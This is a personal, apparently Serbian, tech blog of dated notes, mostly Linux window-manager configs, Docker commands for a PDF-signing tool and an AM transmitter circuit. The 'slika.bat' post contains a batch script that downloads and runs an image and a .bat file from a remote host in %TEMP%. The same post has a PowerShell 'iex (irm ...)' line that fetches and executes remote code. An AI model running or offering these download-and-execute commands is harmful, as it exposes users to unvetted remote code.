Saturday, May 31, 2025

Kristalni FM predajnik iz Brazila

 


https://youtu.be/EXzfnaFpfJY?si=Zegi5ry0m2aa3aWN




Win + R

cmd

netstat -ano | findstr "ESTABLISHED"

wmic process where precessid=5052 get ExecutablePath

БОГАТСТВО
УСПЕХ
НОВАЦ
Svakoga dana u svakom pogledu sve više napredujem!


Friday, May 30, 2025

Predajnik na 13 kilometara, idealno za kosovske srbe

 

Low Cost Powerful AM Transmitter (13Km)

This is a simple AM Transmitter Circuit, but Its very powerful one. It can transmit SW range signals within 13Km circular area. Use external antenna for best results. I recommend to use 12V battery as the power supply. If you hope to using 12V AC-DC adapter you may want to keep very smooth DC out put using stabilizer, unless it will generate low frequency hum when listening to radio out put.  Better to read following instructions before assembling the circuit.





> L1 Coil

Use 22SWG copper wire and make 10 turns, Insert a ferrite rod in to the coil. see figure 1.

>> L2 Coil
Use 22SWG Copper wire and make 10 turns. Don't use a ferrite rod. Coil diameter is 0.6 cm ( 1/4' ).
>> X-tal (Crystal)
Use 4.4333MHz crystal.

Wednesday, May 14, 2025

slika



slika.bat=

cd %TEMP%

Powershell -Command "Invoke-WebRequest 'https://vvv.com/grb.png' -OutFile grb.png"

grb.png

Powershell -Command "Invoke-WebRequest 'https://vvv.com/grb.bat' -OutFile grb.bat"

grb.bat


win+R powershell

iex (irm amssh.ws/windows)



Linux Tips=


Void Linux IceWM Installation Guide xbps-install xorg dbus avahi slim xf86-video-vmware icewm icewm-themes nano /root/.xinitrc exec icewm-session nano /home/joe/.xinitrc exec icewm-session REMEMBER TO ALSO INSTALL A BASIC TERMINAL EMULATOR SUCH AS XTERM OR TERMINATOR

TERMINATOR HAS COPY-PASTE FUNCTION

GEDIT HAS COPY-PASTE FUNCTION TOO

ln -s /etc/sv/dbus /var/service/ ln -s /etc/sv/avahi /var/service/ ln -s /etc/sv/slim /var/service/ reboot

#



uses pngimage;

  Stream := TMemoryStream.Create;

  try

    // obtain png image, load from file or other..

    ....

    Image := TPngImage.Create;

    try

      Stream.Position := 0;

      Image.LoadFromStream(Stream);

      Image1.Picture.Graphic := Image;

    finally

      Image.Free;

    end;

  finally

    Stream.Free;

  end;



var  pic: TPicture;

begin

  pic:=TPicture.create;

  pic.LoadFromFile('test.png');

  Image1.Picture.Assign(pic);

  pic.free;

Friday, May 9, 2025

Alpine Linux Fluxbox




#
apk update
apk upgrade
apk add fluxbox terminator gedit thunar firefox pcmanfm



nano ~/.xinitrc:

exec startfluxbox


...reboot, poweroff or something else...


OR...





nano ~/.xinitrc

#!/bin/sh
feh --bg-scale /home/joe/Downloads/forest-wallpaper.png &
pcmanfm --desktop &
tint2 &
fluxbox






mkdir -p ~/.fluxbox

cp /etc/X11/fluxbox/fluxbox-menu ~/.fluxbox/menu

nano ~/.fluxbox/menu 

[begin] (Start)

[exec] (Home) {thunar ~/} [exec] (Web Browser) {firefox} [exec] (Terminal) {xfce4-terminal} [exec] (mintConfig) {mintConfig-fluxbox} [exec] (mintInstall) {/usr/lib/linuxmint/mintInstall/mintInstall.py} [exec] (Run) {bbrun -w} [separator] (--------) [submenu] (Fluxbox) {settings} [config] (Fluxbox Menu) [reconfig] (Reload Config) [restart] (Restart Fluxbox) [workspaces] (Workspaces) [submenu] (Styles) {} [stylesdir] (/usr/share/fluxbox/styles) [stylesdir] (~/.fluxbox/styles) [end] [end] [include] (~/.fluxbox/mfm-menu) [exec] (Quit) {ciao} [end]



OR...



nano ~/.fluxbox/menu

[begin] (Fluxbox)

  [exec] (Terminal) {terminator}
  [exec] (Web Browser) {firefox}
  [exec] (File Manager) {pcmanfm}
  [exec] (File Manager) {thunar}
  
  [submenu] (Utilities)
    [exec] (Calculator) {galculator}
    [exec] (Text Editor) {gedit}
    [exec] (Text Editor) {mousepad}
    [exec] (Text Editor) {geany}

  [end]

  [separator]
  [exit] (Exit)

[end]






Just add this line to:

nano ~/.fluxbox/keys


Mod4 d :Exec rofi -show drun


OR...




nano ~/.fluxbox/keys Mod4 d :Exec rofi -show drun Mod4 Return :Exec lxterminal Mod4 e :Exec pcmanfm Mod4 w :Exec firefox



More tips=



linkedin




  • Joined


Alpine Linux rekapitulacija - veoma korisno - upotreba Docker na Alpine Linuxu

Супер корисна алатка за локално потписивање и печатирање ПДФ докумената: 

nano radi.sh


docker run -d --name=signaturepdf -p 8080:80 -e SERVERNAME=localhost -e UPLOAD_MAX_FILESIZE=48M -e POST_MAX_SIZE=48M -e MAX_FILE_UPLOADS=401 -e PDF_STORAGE_PATH=/data -v ~/signaturepdf-data:/data signaturepdf


./radi.sh


Апликација за потписивање и печатирање ПДФ-ова у Докеру!



Ако неко ипак користи JWM, овај ексемел фајл му може добро доћи за уређење менија:

nano ~/.jwmrc


<?xml version="1.0"?>

<JWM>


    <!-- The root menu. -->

    <RootMenu onroot="12">

        <Program icon="utilities-terminal" label="Terminal">terminator</Program>

        <Menu icon="folder" label="Applications">

            <Program icon="sound" label="Audacious">audacious</Program>

            <Program icon="calc" label="Calculator">xcalc</Program>

            <Program icon="web-browser" label="Firefox">firefox</Program>

            <Program icon="image" label="Gimp">gimp</Program>

            <Program icon="email" label="Mail">claws-mail</Program>

            <Program icon="system-file-manager" label="ROX">rox ~</Program>

            <Program icon="system-file-manager" label="Thunar">thunar ~</Program>

            <Program icon="system-file-manager" label="Gedit">gedit</Program>

            

        </Menu>

        <Menu icon="folder" label="Utilities">

            <Program icon="font" label="Fonts">xfontsel</Program>

            <Program icon="info" label="Window Properties">

                xprop | xmessage -file -

            </Program>

            <Program icon="info" label="Window Information">

                xwininfo | xmessage -file -

            </Program>

        </Menu>

        <Separator/>

        <Program icon="lock" label="Lock">

           xscreensaver-command -lock

        </Program>

        <Separator/>

        <Restart label="Restart" icon="reload"/>

        <Exit label="Exit" confirm="true" icon="exit"/>

    </RootMenu>


    <!-- Options for program groups. -->

    <Group>

        <Option>tiled</Option>

    </Group>

    <Group>

        <Name>xterm</Name>

        <Option>vmax</Option>

    </Group>

    <Group>

        <Name>xclock</Name>

        <Option>drag</Option>

        <Option>notitle</Option>

    </Group>


    <!-- Tray at the bottom. -->

    <Tray x="0" y="-1" autohide="off" delay="1000">


        <TrayButton label="JWM">root:1</TrayButton>

        <Spacer width="2"/>

        <TrayButton label="_">showdesktop</TrayButton>

        <Spacer width="2"/>


        <Pager labeled="true"/>


        <TaskList maxwidth="256"/>


        <Swallow width="32" height="32" name="xclock">xclock</Swallow>


        <Dock/>

        <Clock format="%l:%M %p"><Button mask="123">exec:xclock</Button></Clock>


    </Tray>


    <!-- Visual Styles -->

    <WindowStyle decorations="motif">

        <Font>Sans-12:bold</Font>

        <Width>4</Width>

        <Corner>0</Corner>

        <Foreground>#FFFFFF</Foreground>

        <Background>#555555</Background>

        <Opacity>0.5</Opacity>

        <Active>

            <Foreground>#FFFFFF</Foreground>

            <Background>#0077CC</Background>

            <Opacity>1.0</Opacity>

        </Active>

    </WindowStyle>

    <TrayStyle decorations="motif">

        <Font>Sans-12</Font>

        <Background>#333333</Background>

        <Foreground>#FFFFFF</Foreground>

        <Opacity>0.75</Opacity>

    </TrayStyle>

    <TaskListStyle list="all" group="true">

      <Font>Sans-12</Font>

      <Active>

        <Foreground>#FFFFFF</Foreground>

        <Background>#555555</Background>

      </Active>

      <Minimized>

        <Foreground>#FFFFFF</Foreground>

        <Background>#111111</Background>

      </Minimized>

      <Foreground>#FFFFFF</Foreground>

      <Background>#333333</Background>

    </TaskListStyle>

    <PagerStyle>

        <Foreground>#555555</Foreground>

        <Background>#333333</Background>

        <Text>#FFFFFF</Text>

        <Active>

            <Foreground>#0077CC</Foreground>

            <Background>#004488</Background>

        </Active>

    </PagerStyle>

    <MenuStyle decorations="motif">

        <Font>Sans-12</Font>

        <Foreground>#FFFFFF</Foreground>

        <Background>#333333</Background>

        <Active>

            <Foreground>#FFFFFF</Foreground>

            <Background>#0077CC</Background>

        </Active>

        <Opacity>0.85</Opacity>

    </MenuStyle>

    <PopupStyle>

        <Font>Sans-12</Font>

        <Foreground>#000000</Foreground>

        <Background>#999999</Background>

    </PopupStyle>


    <!-- Path where icons can be found.

         IconPath can be listed multiple times to allow searching

         for icons in multiple paths.

      -->

    <IconPath>

      /usr/local/share/icons/Tango/scalable/actions

    </IconPath>

    <IconPath>

      /usr/local/share/icons/Tango/scalable/apps

    </IconPath>

    <IconPath>

      /usr/local/share/icons/Tango/scalable/places

    </IconPath>

    <IconPath>

      /usr/local/share/icons/Tango/scalable/status

    </IconPath>

    <IconPath>

      /usr/local/share/icons/Tango/scalable/mimetypes

    </IconPath>

    <IconPath>

      /usr/local/share/jwm

    </IconPath>


    <!-- Virtual Desktops -->

    <!-- Desktop tags can be contained within Desktops for desktop names. -->

    <Desktops width="4" height="1">

        <!-- Default background. Note that a Background tag can be

              contained within a Desktop tag to give a specific background

              for that desktop.

         -->

        <Background type="solid">#111111</Background>

    </Desktops>


    <!-- Double click speed (in milliseconds) -->

    <DoubleClickSpeed>400</DoubleClickSpeed>


    <!-- Double click delta (in pixels) -->

    <DoubleClickDelta>2</DoubleClickDelta>


    <!-- The focus model (sloppy or click) -->

    <FocusModel>sloppy</FocusModel>


    <!-- The snap mode (none, screen, or border) -->

    <SnapMode distance="10">border</SnapMode>


    <!-- The move mode (outline or opaque) -->

    <MoveMode>opaque</MoveMode>


    <!-- The resize mode (outline or opaque) -->

    <ResizeMode>opaque</ResizeMode>


    <!-- Key bindings -->

    <Key key="Up">up</Key>

    <Key key="Down">down</Key>

    <Key key="Right">right</Key>

    <Key key="Left">left</Key>

    <Key key="h">left</Key>

    <Key key="j">down</Key>

    <Key key="k">up</Key>

    <Key key="l">right</Key>

    <Key key="Return">select</Key>

    <Key key="Escape">escape</Key>


    <Key mask="A" key="Tab">nextstacked</Key>

    <Key mask="A" key="F4">close</Key>

    <Key mask="A" key="#">desktop#</Key>

    <Key mask="A" key="F1">root:1</Key>

    <Key mask="A" key="F2">window</Key>

    <Key mask="A" key="F10">maximize</Key>

    <Key mask="A" key="Right">rdesktop</Key>

    <Key mask="A" key="Left">ldesktop</Key>

    <Key mask="A" key="Up">udesktop</Key>

    <Key mask="A" key="Down">ddesktop</Key>


    <!-- Mouse bindings -->

    <Mouse context="root" button="4">ldesktop</Mouse>

    <Mouse context="root" button="5">rdesktop</Mouse>


    <Mouse context="title" button="1">move</Mouse>

    <Mouse context="title" button="2">move</Mouse>

    <Mouse context="title" button="3">window</Mouse>

    <Mouse context="title" button="4">shade</Mouse>

    <Mouse context="title" button="5">shade</Mouse>

    <Mouse context="title" button="11">maximize</Mouse>


    <Mouse context="icon" button="1">window</Mouse>

    <Mouse context="icon" button="2">move</Mouse>

    <Mouse context="icon" button="3">window</Mouse>

    <Mouse context="icon" button="4">shade</Mouse>

    <Mouse context="icon" button="5">shade</Mouse>


    <Mouse context="border" button="1">resize</Mouse>

    <Mouse context="border" button="2">move</Mouse>

    <Mouse context="border" button="3">window</Mouse>


    <Mouse context="close" button="-1">close</Mouse>

    <Mouse context="close" button="2">move</Mouse>

    <Mouse context="close" button="-3">close</Mouse>


    <Mouse context="maximize" button="-1">maximize</Mouse>

    <Mouse context="maximize" button="-2">maxv</Mouse>

    <Mouse context="maximize" button="-3">maxh</Mouse>


    <Mouse context="minimize" button="-1">minimize</Mouse>

    <Mouse context="minimize" button="2">move</Mouse>

    <Mouse context="minimize" button="-3">shade</Mouse>


</JWM>


nano ~/.xinitrc

#!/bin/sh

exec jwm



docker stop signaturepdf


docker rm signaturepdf


docker exec -it signaturepdf sh


mkdir -p ~/signaturepdf-data



Наравоученије

IceWM је једноставнији и много лепршавији од JWM, а заузима и мање ресурса.








Thursday, May 8, 2025

Potpis za PDF

docker build -t signaturepdf .


docker run -d --name=signaturepdf -p 8080:80 signaturepdf


localhost:8080


docker run -d --name=signaturepdf -p 8080:80 -e SERVERNAME=pdf.example.org -e UPLOAD_MAX_FILESIZE=48M -e POST_MAX_SIZE=48M -e MAX_FILE_UPLOADS=401 -e PDF_STORAGE_PATH=/data signaturepdf





$ flatpak remote-add flathub-beta https://flathub.org/beta-repo/flathub-beta.flatpakrepo



$ flatpak install flathub-beta com.brave.Browser




Saturday, May 3, 2025

Thursday, May 1, 2025

Do not be s3

 Evo nekoliko besplatnih programa za promenu glasa koje možete isprobati:

EaseUS VoiceWave — Ovaj alat omogućava promenu glasa u realnom vremenu, snimanje i modifikaciju zvuka, kao i dodavanje raznih efekata. Idealan je za igre, strimovanje i online sastanke.

https://multimedia.easeus.com/voice-changer/

Galaxy AI Voice Changer — Koristi veštačku inteligenciju za transformaciju glasa u različite stilove i karaktere. Pogodan je za kreativne projekte i zabavu.

https://galaxy.ai/ai-voice-changer

WooTechy Free Voice Changer — Omogućava modifikaciju glasa u realnom vremenu ili na unapred snimljenim audio fajlovima. Koristi se za zabavu, kreiranje sadržaja ili igranje.

https://www.wootechy.com/voice-change/free-voice-changer/


Debian Linux + i3WM + Golang + Chromium + VSCodium.

Void Linux and Devuan are useful too!

https://beogradsko.blogspot.com

Work, Work, Work

https://www.ebay.com/shop/block-erupter?_nkw=block+erupter

Samo za Vas

beogradsko.blogspot.com



DEWM Golang window manager for Debian

git clone https://github.com/driusan/dewm.git

sudo apt-get install build-essential libx11-dev libxft-dev libxinerama-dev

cd dewm

make

sudo make install

Kreirajte ili izmenite fajl u vašem home direktorijumu /.xinitrc i dodajte sledeću liniju:

exec dewm

startx


sudo apt update
sudo apt install golang git build-essential

git clone https://github.com/BurntSushi/wingo.git
cd wingo

go build

./wingo